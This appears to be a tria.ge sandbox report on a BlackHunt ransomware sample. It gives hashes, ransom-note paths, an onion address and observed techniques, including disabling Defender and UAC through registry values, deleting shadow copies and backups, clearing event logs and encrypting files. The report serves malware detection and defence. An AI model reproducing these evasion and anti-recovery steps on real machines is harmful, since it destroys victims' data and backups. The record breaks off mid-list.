Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Resource
win10v2004-20231215-en
General
-
Target
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
-
Size
707KB
-
MD5
352a8dfb2827d4acb843a31d0d5cb6e9
-
SHA1
2b0c654ca2329c2c9b04fb39c7cd1f3a534956b1
-
SHA256
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0
-
SHA512
cc6a00c5114aec92ddd22aa2776b646919e9d7056d3dd2edbb81be819733b3c24505d94d7916abb70af7215acdb6b4394c485af1b55bf3cbe0893a78bcae2efb
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWgFh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 14036 fsutil.exe 9572 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 13296 wevtutil.exe 14144 wevtutil.exe 14812 wevtutil.exe 9176 wevtutil.exe 10616 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2288 bcdedit.exe 8236 bcdedit.exe 13972 bcdedit.exe 14172 bcdedit.exe -
Renames multiple (3388) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9564 wbadmin.exe 11672 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\V: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\N: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Q: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\T: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\H: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\W: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\O: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\E: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\J: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\I: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\B: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\M: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\K: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\X: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\R: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\L: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Z: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\P: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\G: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Y: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\S: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ar-ae\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\he-il\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_24.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_18.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info2x.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main-selector.css ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-1x.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\calendars.properties ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3144 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2840 vssadmin.exe 3960 vssadmin.exe 2924 vssadmin.exe 348 vssadmin.exe 4548 vssadmin.exe 14700 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14628 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7572 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeRestorePrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeBackupPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeTakeOwnershipPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeAuditPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeSecurityPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeIncBasePriorityPrivilege 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeBackupPrivilege 2436 vssvc.exe Token: SeRestorePrivilege 2436 vssvc.exe Token: SeAuditPrivilege 2436 vssvc.exe Token: SeBackupPrivilege 7536 wbengine.exe Token: SeRestorePrivilege 7536 wbengine.exe Token: SeSecurityPrivilege 7536 wbengine.exe Token: SeSecurityPrivilege 13296 wevtutil.exe Token: SeBackupPrivilege 13296 wevtutil.exe Token: SeSecurityPrivilege 14144 wevtutil.exe Token: SeBackupPrivilege 14144 wevtutil.exe Token: SeSecurityPrivilege 14812 wevtutil.exe Token: SeBackupPrivilege 14812 wevtutil.exe Token: SeSecurityPrivilege 9176 wevtutil.exe Token: SeBackupPrivilege 9176 wevtutil.exe Token: SeSecurityPrivilege 10616 wevtutil.exe Token: SeBackupPrivilege 10616 wevtutil.exe Token: SeDebugPrivilege 14628 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4480 wrote to memory of 4504 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 89 PID 4480 wrote to memory of 4504 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 89 PID 4480 wrote to memory of 3876 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 91 PID 4480 wrote to memory of 3876 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 91 PID 4480 wrote to memory of 4920 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 93 PID 4480 wrote to memory of 4920 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 93 PID 4480 wrote to memory of 548 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 95 PID 4480 wrote to memory of 548 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 95 PID 4504 wrote to memory of 3340 4504 cmd.exe 97 PID 4504 wrote to memory of 3340 4504 cmd.exe 97 PID 4480 wrote to memory of 4452 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 98 PID 4480 wrote to memory of 4452 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 98 PID 3876 wrote to memory of 4844 3876 cmd.exe 173 PID 3876 wrote to memory of 4844 3876 cmd.exe 173 PID 4480 wrote to memory of 4596 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 102 PID 4480 wrote to memory of 4596 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 102 PID 4920 wrote to memory of 3732 4920 cmd.exe 103 PID 4920 wrote to memory of 3732 4920 cmd.exe 103 PID 4480 wrote to memory of 3280 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 104 PID 4480 wrote to memory of 3280 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 104 PID 4480 wrote to memory of 1560 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 187 PID 4480 wrote to memory of 1560 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 187 PID 4480 wrote to memory of 4424 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 109 PID 4480 wrote to memory of 4424 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 109 PID 548 wrote to memory of 1880 548 cmd.exe 108 PID 548 wrote to memory of 1880 548 cmd.exe 108 PID 4480 wrote to memory of 2172 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 201 PID 4480 wrote to memory of 2172 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 201 PID 4480 wrote to memory of 4900 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 112 PID 4480 wrote to memory of 4900 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 112 PID 4480 wrote to memory of 4312 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 114 PID 4480 wrote to memory of 4312 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 114 PID 4480 wrote to memory of 1984 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 117 PID 4480 wrote to memory of 1984 4480 